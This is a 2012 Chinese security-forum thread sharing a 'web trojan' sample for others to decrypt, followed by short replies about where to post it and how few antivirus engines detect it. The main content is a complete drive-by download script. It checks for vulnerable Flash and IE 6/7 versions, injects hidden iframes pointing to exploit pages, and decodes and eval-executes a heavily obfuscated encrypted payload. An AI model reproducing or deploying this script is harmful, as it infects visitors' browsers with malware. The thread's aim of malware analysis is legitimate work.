网马样本一个

显示全部楼层 · 发表于 2012-2-26 22:33:42

本帖最后由 dayang1717 于 2012-2-26 22:41 编辑

<script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
function whQd8(){
var PActFBC3=deconcept.SWFObjectUtil.getPlayerVersion();
if(PActFBC3['major']==10&&PActFBC3['minor']<=3&&PActFBC3['rev']<183)
{
document.writeln("<iframe src=ff.html><\/iframe>");
}
else {
var ztiMMNj5 = window.navigator.userAgent.toLowerCase();
if ((ztiMMNj5.indexOf('msie 6.0') > -1) || (ztiMMNj5.indexOf('msie 7.0') > -1)) {
document.writeln("<iframe src=i.html><\/iframe>");
}
}
}
if(document.cookie.indexOf("dadong=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="dadong=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")!=-1)
{
CKHDvaJ3 = eval;IYOdbS4=unescape;yFPqcPB8="1C110A17011C4645CBF2D1F4C185F7A5AA9D791A3F3FA696B086B52D6D53A88AEACD341C7C4BB3F99D2119B7A39D6B5107FCB2C27C21E6C89B7121FFE65202D590633FDB8F6839F98B67768D95461CB163BFD22C7CA8683CCD50FD9A41BD9059F3806EC544EA49FA994707B240FE1CC32FDC6D1C967C55CF078E8979E71EDA4ECC6CEA5EC714D479D57FF177D16CEA718F70CF56FD638D37F53D840DEE3CAB20AC65C351BB79BC34C22199478465B55CF14FB44285558F38D77BA16DB654976FE305B129B073A93BBA681D16D70BCA1AE279852585618B778D788F150C0B7238DB1606330D9627377C9547259559679D217214310C629267886B4962403823566C57696070736F504F76731608406478285F450E0B271A19776163696F743D766E4141584C21353666405063794E13606F5227263B03432F78506D48284B6B4C63112E73792E4068525A6A5B7B6B596F6077104C4D757B37180A24287B787D746F692379797763741F0B00187F051E46405063794E13627A5C627542340671340F01266247675D6B49624038224B6D4F3364456F6F534E5B6F5743453C6F2B54554846352C1E1A786C7F2E777C7978434D400720677754425B696C045E787A5471787365412D735A78042158655A67412B1D2D4D2E6E597361547B7B1344796A5B12037069305B13122F16707C7E6A6C697F3E657670574C0C182C7C60511511282E1E13392D1B372B18381C6F705D604929493506635469162D4D2E6E597361547B245C5A6862504B627C61285E194E4D727372747F2436031A6E1A164745425F647F7C704B062F3111300024380F795365413473146267724C36130B2668517A25506C16776B5D5347525C203C3325457164214E5409667344607C3A36000474767B79564C11420271604C1C050A124E58667A41603D754E4F1162463E170B22604D6A49785136164559624A330E1200594F74624A4A017341035D791D19111D77756268796B307D545D514F72087F051E454A52626C4F1D7D68446D250D042E24735869586308476E6966340F1B4A406C5A7871503F4E6543616E09142C1E6C2156545D473C616952413836031A777270475D541A3D4E44504C6E45201130007B506978426C040A6F735A423E130922624960516225044A7D5541437E400E11150D5A4A4D717C211A6651614455212B0307696B7C76637902606875206A471514330D7C4F516F6B50256B574D4936400737210C4C614463586914462A556C7F4A370E1200594F74624A4A016050085701122F1673767C6B79682E695475586970720F7F051E454A52626C4F1D5A765243290D042E24735869586308604C7256686361731F043C7960597A7E580A51416E6643613E7F373B4D47707267752E66544D775426272F237255286471425B79666A485C6D7A1D2C263B03";nKtd2="function jnhLMov8(){DoSsl4=Math.PI;IFPIbu6=Math.tan;xFytm3=parseInt;CGkQtr2='length';PigF4='test';PjqeIW2='replace';VaPTW6=xFytm3(~((DoSsl4&DoSsl4)|(~DoSsl4&DoSsl4)&(DoSsl4&~DoSsl4)|(~DoSsl4&~DoSsl4)));gIGgH4=xFytm3(((VaPTW6&VaPTW6)|(~VaPTW6&VaPTW6)&(VaPTW6&~VaPTW6)|(~VaPTW6&~VaPTW6))&1);/*Encrypt By dadong's JSXX 0.41 VIP*/nCAsfC2=gIGgH4<<gIGgH4;new function(){JyGVn8=CKHDvaJ3('a1Qe4dG*]6zY^k8b]#&,m8$[x_GD3]Nvj5dsn7[F[8ecu[S34Rlc]4r;iadpDt='[PjqeIW2](/[^xS@0ietrc9p]/g,''));};try{if(!\/^\\d*$\/g[PigF4](wwqh8));}catch(e){wwqh8=VaPTW6;}CFoJ8='';DXiyi7=eval(IYOdbS4('%5'+'3%74%'+'72%69%6'+'E%67%2E%'+'66%72%'+'6F%6D%4'+'3%68%61'+'%72%4'+'3%6F%64'+'%65'));for(vzBO5=VaPTW6;vzBO5<nKtd2[CGkQtr2];vzBO5-=-gIGgH4)wwqh8+=nKtd2.charCodeAt(vzBO5);wwqh8%=IYOdbS4(VaPTW6+IYOdbS4('x')+(1<<6)-gIGgH4);ddtzdWw3+=gIGgH4;for(vzBO5=VaPTW6,vaDmvV3=gIGgH4;vzBO5<yFPqcPB8[CGkQtr2];vzBO5+=nCAsfC2,vaDmvV3++,wwqh8=wwqh8+vaDmvV3){if(\/^(\\d{4})\/g[PigF4](wwqh8+744))wwqh8%=71;CFoJ8+=DXiyi7(xFytm3(VaPTW6+IYOdbS4('x')+yFPqcPB8.charAt(vzBO5)+yFPqcPB8.charAt(vzBO5+xFytm3(gIGgH4)))^wwqh8);}try{new function(){JyGVn8(CFoJ8);}}catch(e){try{new function(){tXLm0=parseInt;IFPIbu6(CFoJ8);}}catch(e) {window.location='.';}}}try{CKHDvaJ3('jnhLMov8();')}catch(e) {try{ddtzdWw3=VaPTW6;CKHDvaJ3('jnhLMov8();');}catch(e){alert('ere');}}";WxCXB2 = CKHDvaJ3(CKHDvaJ3);WxCXB2(nKtd2);
}
}
</script>

直接上代码，请高手能解密出来，哈哈

显示全部楼层 · 发表于 2012-2-26 22:51:17

http://bbs.kafan.cn/forum-105-1.html

发到这个区。

显示全部楼层 · 发表于 2012-2-26 22:53:07

貌似还有马

显示全部楼层 · 发表于 2012-2-27 14:06:09

发个代码，扫描党们就没动静了

显示全部楼层 · 发表于 2012-2-27 15:47:06

卡巴报了，我看看

显示全部楼层 · 发表于 2012-2-27 21:01:10

无论是保存成。exe还是.html.都只有五家报毒

显示全部楼层 · 发表于 2012-2-27 22:24:25

文件信息
文件名称：E:\外{过}{滤}挂\新建文本文档.exe
文件大小：
4 Kb
内部名称：
无内部名称
文件签名：
无文件签名信息
文件描述：
是一个安全的文件
文件MD5：
5de2f081964118defa0439d1b9e54645

[病毒样本] 网马样本一个